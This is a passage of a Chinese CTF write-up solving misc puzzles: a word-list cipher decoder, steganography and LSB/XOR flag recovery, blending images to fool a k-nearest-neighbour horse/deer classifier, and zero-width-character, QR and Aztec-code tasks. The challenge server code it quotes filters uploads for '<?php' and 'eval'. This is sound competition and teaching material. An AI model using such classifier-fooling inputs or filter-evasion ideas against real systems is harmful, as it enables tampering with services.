class="s1">&#39;megaton&#39;</span><span class="p">,</span> <span class="s1">&#39;microscope&#39;</span><span class="p">,</span> <span class="s1">&#39;microwave&#39;</span><span class="p">,</span> <span class="s1">&#39;midsummer&#39;</span><span class="p">,</span> <span class="s1">&#39;millionaire&#39;</span><span class="p">,</span> <span class="s1">&#39;miracle&#39;</span><span class="p">,</span> <span class="s1">&#39;misnomer&#39;</span><span class="p">,</span> <span class="s1">&#39;molasses&#39;</span><span class="p">,</span> <span class="s1">&#39;molecule&#39;</span><span class="p">,</span> <span class="s1">&#39;Montana&#39;</span><span class="p">,</span> <span class="s1">&#39;monument&#39;</span><span class="p">,</span> <span class="s1">&#39;mosquito&#39;</span><span class="p">,</span> <span class="s1">&#39;narrative&#39;</span><span class="p">,</span> <span class="s1">&#39;nebula&#39;</span><span class="p">,</span> <span class="s1">&#39;newsletter&#39;</span><span class="p">,</span> <span class="s1">&#39;Norwegian&#39;</span><span class="p">,</span> <span class="s1">&#39;October&#39;</span><span class="p">,</span> <span class="s1">&#39;Ohio&#39;</span><span class="p">,</span> <span class="s1">&#39;onlooker&#39;</span><span class="p">,</span> <span class="s1">&#39;opulent&#39;</span><span class="p">,</span> <span class="s1">&#39;Orlando&#39;</span><span class="p">,</span> <span class="s1">&#39;outfielder&#39;</span><span class="p">,</span> <span class="s1">&#39;Pacific&#39;</span><span class="p">,</span> <span class="s1">&#39;pandemic&#39;</span><span class="p">,</span> <span class="s1">&#39;Pandora&#39;</span><span class="p">,</span> <span class="s1">&#39;paperweight&#39;</span><span class="p">,</span> <span class="s1">&#39;paragon&#39;</span><span class="p">,</span> <span class="s1">&#39;paragraph&#39;</span><span class="p">,</span> <span class="s1">&#39;paramount&#39;</span><span class="p">,</span> <span class="s1">&#39;passenger&#39;</span><span class="p">,</span> <span class="s1">&#39;pedigree&#39;</span><span class="p">,</span> <span class="s1">&#39;Pegasus&#39;</span><span class="p">,</span> <span class="s1">&#39;penetrate&#39;</span><span class="p">,</span> <span class="s1">&#39;perceptive&#39;</span><span class="p">,</span> <span class="s1">&#39;performance&#39;</span><span class="p">,</span> <span class="s1">&#39;pharmacy&#39;</span><span class="p">,</span> <span class="s1">&#39;phonetic&#39;</span><span class="p">,</span> <span class="s1">&#39;photograph&#39;</span><span class="p">,</span> <span class="s1">&#39;pioneer&#39;</span><span class="p">,</span> <span class="s1">&#39;pocketful&#39;</span><span class="p">,</span> <span class="s1">&#39;politeness&#39;</span><span class="p">,</span> <span class="s1">&#39;positive&#39;</span><span class="p">,</span> <span class="s1">&#39;potato&#39;</span><span class="p">,</span> <span class="s1">&#39;processor&#39;</span><span class="p">,</span> <span class="s1">&#39;provincial&#39;</span><span class="p">,</span> <span class="s1">&#39;proximate&#39;</span><span class="p">,</span> <span class="s1">&#39;puberty&#39;</span><span class="p">,</span> <span class="s1">&#39;publisher&#39;</span><span class="p">,</span> <span class="s1">&#39;pyramid&#39;</span><span class="p">,</span> <span class="s1">&#39;quantity&#39;</span><span class="p">,</span> <span class="s1">&#39;racketeer&#39;</span><span class="p">,</span> <span class="s1">&#39;rebellion&#39;</span><span class="p">,</span> <span class="s1">&#39;recipe&#39;</span><span class="p">,</span> <span class="s1">&#39;recover&#39;</span><span class="p">,</span> <span class="s1">&#39;repellent&#39;</span><span class="p">,</span> <span class="s1">&#39;replica&#39;</span><span class="p">,</span> <span class="s1">&#39;reproduce&#39;</span><span class="p">,</span> <span class="s1">&#39;resistor&#39;</span><span class="p">,</span> <span class="s1">&#39;responsive&#39;</span><span class="p">,</span> <span class="s1">&#39;retraction&#39;</span><span class="p">,</span> <span class="s1">&#39;retrieval&#39;</span><span class="p">,</span> <span class="s1">&#39;retrospect&#39;</span><span class="p">,</span> <span class="s1">&#39;revenue&#39;</span><span class="p">,</span> <span class="s1">&#39;revival&#39;</span><span class="p">,</span> <span class="s1">&#39;revolver&#39;</span><span class="p">,</span> <span class="s1">&#39;sandalwood&#39;</span><span class="p">,</span> <span class="s1">&#39;sardonic&#39;</span><span class="p">,</span> <span class="s1">&#39;Saturday&#39;</span><span class="p">,</span> <span class="s1">&#39;savagery&#39;</span><span class="p">,</span> <span class="s1">&#39;scavenger&#39;</span><span class="p">,</span> <span class="s1">&#39;sensation&#39;</span><span class="p">,</span> <span class="s1">&#39;sociable&#39;</span><span class="p">,</span> <span class="s1">&#39;souvenir&#39;</span><span class="p">,</span> <span class="s1">&#39;specialist&#39;</span><span class="p">,</span> <span class="s1">&#39;speculate&#39;</span><span class="p">,</span> <span class="s1">&#39;stethoscope&#39;</span><span class="p">,</span> <span class="s1">&#39;stupendous&#39;</span><span class="p">,</span> <span class="s1">&#39;supportive&#39;</span><span class="p">,</span> <span class="s1">&#39;surrender&#39;</span><span class="p">,</span> <span class="s1">&#39;suspicious&#39;</span><span class="p">,</span> <span class="s1">&#39;sympathy&#39;</span><span class="p">,</span> <span class="s1">&#39;tambourine&#39;</span><span class="p">,</span> <span class="s1">&#39;telephone&#39;</span><span class="p">,</span> <span class="s1">&#39;therapist&#39;</span><span class="p">,</span> <span class="s1">&#39;tobacco&#39;</span><span class="p">,</span> <span class="s1">&#39;tolerance&#39;</span><span class="p">,</span> <span class="s1">&#39;tomorrow&#39;</span><span class="p">,</span> <span class="s1">&#39;torpedo&#39;</span><span class="p">,</span> <span class="s1">&#39;tradition&#39;</span><span class="p">,</span> <span class="s1">&#39;travesty&#39;</span><span class="p">,</span> <span class="s1">&#39;trombonist&#39;</span><span class="p">,</span> <span class="s1">&#39;truncated&#39;</span><span class="p">,</span> <span class="s1">&#39;typewriter&#39;</span><span class="p">,</span> <span class="s1">&#39;ultimate&#39;</span><span class="p">,</span> <span class="s1">&#39;undaunted&#39;</span><span class="p">,</span> <span class="s1">&#39;underfoot&#39;</span><span class="p">,</span> <span class="s1">&#39;unicorn&#39;</span><span class="p">,</span> <span class="s1">&#39;unify&#39;</span><span class="p">,</span> <span class="s1">&#39;universe&#39;</span><span class="p">,</span> <span class="s1">&#39;unravel&#39;</span><span class="p">,</span> <span class="s1">&#39;upcoming&#39;</span><span class="p">,</span> <span class="s1">&#39;vacancy&#39;</span><span class="p">,</span> <span class="s1">&#39;vagabond&#39;</span><span class="p">,</span> <span class="s1">&#39;vertigo&#39;</span><span class="p">,</span> <span class="s1">&#39;Virginia&#39;</span><span class="p">,</span> <span class="s1">&#39;visitor&#39;</span><span class="p">,</span> <span class="s1">&#39;vocalist&#39;</span><span class="p">,</span> <span class="s1">&#39;voyager&#39;</span><span class="p">,</span> <span class="s1">&#39;warranty&#39;</span><span class="p">,</span> <span class="s1">&#39;Waterloo&#39;</span><span class="p">,</span> <span class="s1">&#39;whimsical&#39;</span><span class="p">,</span> <span class="s1">&#39;Wichita&#39;</span><span class="p">,</span> <span class="s1">&#39;Wilmington&#39;</span><span class="p">,</span> <span class="s1">&#39;Wyoming&#39;</span><span class="p">,</span> <span class="s1">&#39;yesteryear&#39;</span><span class="p">,</span> <span class="s1">&#39;Yucatan&#39;</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">cipher</span><span class="p">)):</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">odd_list</span><span class="p">)):</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="n">odd_list</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="o">==</span> <span class="n">cipher</span><span class="p">[</span><span class="n">i</span><span class="p">]:</span>
</span></span><span class="line"><span class="cl">            <span class="n">cipher</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">j</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="n">k</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">even_list</span><span class="p">)):</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="n">odd_list</span><span class="p">[</span><span class="n">k</span><span class="p">]</span> <span class="o">==</span> <span class="n">cipher</span><span class="p">[</span><span class="n">i</span><span class="p">]:</span>
</span></span><span class="line"><span class="cl">            <span class="n">cipher</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">k</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">cipher</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    <span class="nb">print</span><span class="p">(</span><span class="n">i</span><span class="p">,</span><span class="n">end</span><span class="o">=</span><span class="s1">&#39;&#39;</span><span class="p">)</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>GitHub找到个stegpy的项目</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">pip3 install stegpy
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ stegpy.exe encode.webp
</span></span><span class="line"><span class="cl">the_password_is:Yus@_1s_YYddddsstegpy encode.webp the_key_is:Yus@_yydsstegpy!!
</span></span></code></pre></td></tr></table>
</div>
</div><p>得到两个密码 都试了一下 第二个能解hint.rar得到一个hint.jpg</p>
<p>官方放了个hint：invisible 不然我要骂人了。InvisibleSecre隐写 <a href="https://www.onlinedown.net/soft/4655.htm">华军上下了一个很古老的软件。。。。</a></p>
<p>网页源码里说&quot;Yusa&quot;在这题很重要 用&quot;Yusa&quot;解密，加密算法选最后一个，得到encode脚本</p>
<p><img src="https://img-blog.csdnimg.cn/20201008223928543.png" alt="" /></p>
<p>简单分析一下是生成两个随机密钥流 然后跟flag.png 每像素异或 然后用lsb原理往source.png像素里加flag.png 流1加密在R通道 流2加密在G通道 enc写到B通道</p>
<p>解密只需各个取出最后一位 然后异或回来就是flag了</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span><span class="lnt">45
</span><span class="lnt">46
</span><span class="lnt">47
</span><span class="lnt">48
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">PIL</span> <span class="kn">import</span> <span class="n">Image</span>
</span></span><span class="line"><span class="cl"><span class="n">en_p</span> <span class="o">=</span> <span class="n">Image</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="s1">&#39;./encode.png&#39;</span><span class="p">)</span><span class="o">.</span><span class="n">convert</span><span class="p">(</span><span class="s1">&#39;RGB&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">a</span><span class="p">,</span><span class="n">b</span> <span class="o">=</span> <span class="n">en_p</span><span class="o">.</span><span class="n">size</span>
</span></span><span class="line"><span class="cl"><span class="n">R</span><span class="o">=</span><span class="p">[]</span>
</span></span><span class="line"><span class="cl"><span class="n">G</span><span class="o">=</span><span class="p">[]</span>
</span></span><span class="line"><span class="cl"><span class="n">B</span><span class="o">=</span><span class="p">[]</span>
</span></span><span class="line"><span class="cl"><span class="n">key1stream</span> <span class="o">=</span> <span class="p">[]</span>
</span></span><span class="line"><span class="cl"><span class="n">key2stream</span> <span class="o">=</span> <span class="p">[]</span>
</span></span><span class="line"><span class="cl"><span class="n">enc</span> <span class="o">=</span> <span class="p">[]</span>
</span></span><span class="line"><span class="cl"><span class="n">flag</span> <span class="o">=</span> <span class="p">[]</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">a</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="n">y</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">b</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">        <span class="n">tmp</span> <span class="o">=</span> <span class="n">en_p</span><span class="o">.</span><span class="n">getpixel</span><span class="p">((</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">))</span> 
</span></span><span class="line"><span class="cl">        <span class="n">R</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">tmp</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
</span></span><span class="line"><span class="cl">        <span class="n">G</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">tmp</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span>
</span></span><span class="line"><span class="cl">        <span class="n">B</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">tmp</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 取出lsb数据</span>
</span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">R</span><span class="p">)):</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="nb">bin</span><span class="p">(</span><span class="n">R</span><span class="p">[</span><span class="n">i</span><span class="p">])[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s1">&#39;1&#39;</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">key1stream</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">key1stream</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="nb">bin</span><span class="p">(</span><span class="n">G</span><span class="p">[</span><span class="n">i</span><span class="p">])[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s1">&#39;1&#39;</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">key2stream</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">key2stream</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="nb">bin</span><span class="p">(</span><span class="n">B</span><span class="p">[</span><span class="n">i</span><span class="p">])[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s1">&#39;1&#39;</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">enc</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">enc</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 恢复flag</span>
</span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">enc</span><span class="p">)):</span>
</span></span><span class="line"><span class="cl">    <span class="n">flag</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">enc</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">^</span><span class="n">key1stream</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">^</span><span class="n">key2stream</span><span class="p">[</span><span class="n">i</span><span class="p">])</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 简单画一下</span>
</span></span><span class="line"><span class="cl"><span class="n">img</span> <span class="o">=</span> <span class="n">Image</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="s1">&#39;RGB&#39;</span><span class="p">,(</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">),(</span><span class="mi">255</span><span class="p">,</span><span class="mi">255</span><span class="p">,</span><span class="mi">255</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">a</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="n">y</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">b</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="n">flag</span><span class="p">[</span><span class="n">y</span><span class="o">+</span><span class="n">x</span><span class="o">*</span><span class="n">b</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="n">img</span><span class="o">.</span><span class="n">putpixel</span><span class="p">((</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">),(</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="n">img</span><span class="o">.</span><span class="n">putpixel</span><span class="p">((</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">),(</span><span class="mi">255</span><span class="p">,</span><span class="mi">255</span><span class="p">,</span><span class="mi">255</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="n">img</span><span class="o">.</span><span class="n">save</span><span class="p">(</span><span class="s1">&#39;flag.png&#39;</span><span class="p">)</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="指鹿为马">指鹿为马</h3>
<p>CNN 我继续爬<br />
据说ps一下也成，没成功，呜呜呜</p>
<p>opencv改下透明度 拼一下图</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">cv2</span> <span class="k">as</span> <span class="nn">cv</span>
</span></span><span class="line"><span class="cl"><span class="n">alpha</span> <span class="o">=</span> <span class="mf">0.5</span>
</span></span><span class="line"><span class="cl"><span class="n">horse</span> <span class="o">=</span> <span class="n">cv</span><span class="o">.</span><span class="n">imread</span><span class="p">(</span><span class="s1">&#39;horse.png&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">deer</span> <span class="o">=</span> <span class="n">cv</span><span class="o">.</span><span class="n">imread</span><span class="p">(</span><span class="s1">&#39;deer.png&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">dst</span> <span class="o">=</span> <span class="n">cv</span><span class="o">.</span><span class="n">addWeighted</span><span class="p">(</span><span class="n">horse</span><span class="p">,</span> <span class="n">alpha</span><span class="p">,</span> <span class="n">deer</span><span class="p">,</span> <span class="mf">0.4</span><span class="p">,</span> <span class="mf">0.0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">cv</span><span class="o">.</span><span class="n">imwrite</span><span class="p">(</span><span class="s1">&#39;image.png&#39;</span><span class="p">,</span> <span class="n">dst</span><span class="p">)</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>复现的时候靶机已经关了，本地魔改了一下能跑出来。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">    <span class="k">while</span> <span class="mi">1</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">pic</span> <span class="o">=</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64encode</span><span class="p">(</span><span class="nb">open</span><span class="p">(</span><span class="s1">&#39;./image.png&#39;</span><span class="p">,</span> <span class="s2">&#34;rb&#34;</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">())</span>
</span></span><span class="line"><span class="cl">        <span class="k">try</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="n">pic</span> <span class="o">=</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64decode</span><span class="p">(</span><span class="n">pic</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="k">except</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="n">exit</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="sa">b</span><span class="s2">&#34;&lt;?php&#34;</span> <span class="ow">in</span> <span class="n">pic</span> <span class="ow">or</span> <span class="sa">b</span><span class="s1">&#39;eval&#39;</span> <span class="ow">in</span> <span class="n">pic</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;Hacker!!This is not WEB,It`s Just a misc!!!&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="n">exit</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">        <span class="n">salt</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">random</span><span class="o">.</span><span class="n">getrandbits</span><span class="p">(</span><span class="mi">15</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">        <span class="n">pic_name</span> <span class="o">=</span> <span class="s1">&#39;tmp_&#39;</span><span class="o">+</span><span class="n">salt</span><span class="o">+</span><span class="s1">&#39;.png&#39;</span>
</span></span><span class="line"><span class="cl">        <span class="n">tmp_pic</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">pic_name</span><span class="p">,</span><span class="s1">&#39;wb&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">tmp_pic</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">pic</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">tmp_pic</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">        <span class="n">ma</span> <span class="o">=</span> <span class="n">load_horse</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">        <span class="n">lu</span> <span class="o">=</span> <span class="n">load_deer</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">        <span class="n">k</span> <span class="o">=</span> <span class="mi">1</span>
</span></span><span class="line"><span class="cl">        <span class="n">trainingSet</span> <span class="o">=</span> <span class="n">np</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">ma</span><span class="p">,</span> <span class="n">lu</span><span class="p">)</span><span class="o">.</span><span class="n">reshape</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">5185</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">testSet</span> <span class="o">=</span> <span class="n">load_test</span><span class="p">(</span><span class="n">pic_name</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">neighbors</span> <span class="o">=</span> <span class="n">getNeighbors</span><span class="p">(</span><span class="n">trainingSet</span><span class="p">,</span> <span class="n">testSet</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">k</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">result</span> <span class="o">=</span> <span class="n">getResponse</span><span class="p">(</span><span class="n">neighbors</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="nb">repr</span><span class="p">(</span><span class="n">result</span><span class="p">)</span> <span class="o">==</span> <span class="s1">&#39;0&#39;</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;Yes,I want this horse like deer,here is your flag encoded by base64&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="n">flag</span> <span class="o">=</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64encode</span><span class="p">(</span><span class="nb">open</span><span class="p">(</span><span class="s1">&#39;flag&#39;</span><span class="p">,</span><span class="s1">&#39;rb&#39;</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">())</span>
</span></span><span class="line"><span class="cl">            <span class="nb">print</span><span class="p">(</span><span class="n">flag</span><span class="o">.</span><span class="n">decode</span><span class="p">())</span>
</span></span><span class="line"><span class="cl">            <span class="n">os</span><span class="o">.</span><span class="n">remove</span><span class="p">(</span><span class="n">pic_name</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="k">break</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;I want horse but not deer!!!&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="n">os</span><span class="o">.</span><span class="n">remove</span><span class="p">(</span><span class="n">pic_name</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="k">break</span>
</span></span><span class="line"><span class="cl">    <span class="n">exit</span><span class="p">()</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="https://img-blog.csdnimg.cn/20201010011148866.png#pic_center" alt="" /></p>
<h3 id="barbar">Barbar</h3>
<p>得到一个附件超大QRcode，CQR扫码看到一串问号，微信扫码却没看到，第一反应就是零宽字符。</p>
<p><img src="https://img-blog.csdnimg.cn/20201009002424626.png" alt="" /></p>
<p>但是一开始找的网站解密错误得到错的，然后整个题目毫无进展。最后得到一个<a href="https://yuanfux.github.io/zero-width-web/">能正确解的网站</a>。。。。wsfw没错了</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">False:ntentteanetekettterieeenaeatttedtttt
</span></span><span class="line"><span class="cl">True:YcfVgMBUraXftwO6Cp92YBGAbyRyWNOO
</span></span></code></pre></td></tr></table>
</div>
</div><p>解压得到一个破损二维码和一个docx，修复二维码扫描得到这个，我透！</p>
<p><img src="https://img-blog.csdnimg.cn/2020100822534080.png#pic_center" alt="" /></p>
<p>docx丢kali在document.xml里找到一串base64</p>
<p><img src="https://img-blog.csdnimg.cn/20201008225552243.png" alt="" /></p>
<p>去掉中间的字符后解码得到一个Aztec Code</p>
<p><img src="https://img-blog.csdnimg.cn/20201008225914450.png#pic_center" alt="" /></p>
<p>可以<a href="https://demo.dynamsoft.com/DBR/BarcodeReaderDemo.aspx">在线解码</a>得到一串flag类似物</p>
